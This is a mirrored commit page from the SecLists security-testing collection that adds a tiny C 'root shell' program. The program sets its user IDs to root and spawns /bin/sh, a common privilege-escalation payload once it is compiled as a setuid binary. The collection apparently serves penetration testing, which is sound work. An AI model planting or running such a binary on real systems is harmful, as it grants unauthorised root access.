mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-07-23 04:12:05 +00:00
Add example c root-shells
This commit is contained in:
@@ -0,0 +1,2 @@
|
||||
// $ gcc tiny-shell.c
|
||||
int main(void){setresuid(0, 0, 0);system("/bin/sh");}
|
||||
Reference in New Issue
Block a user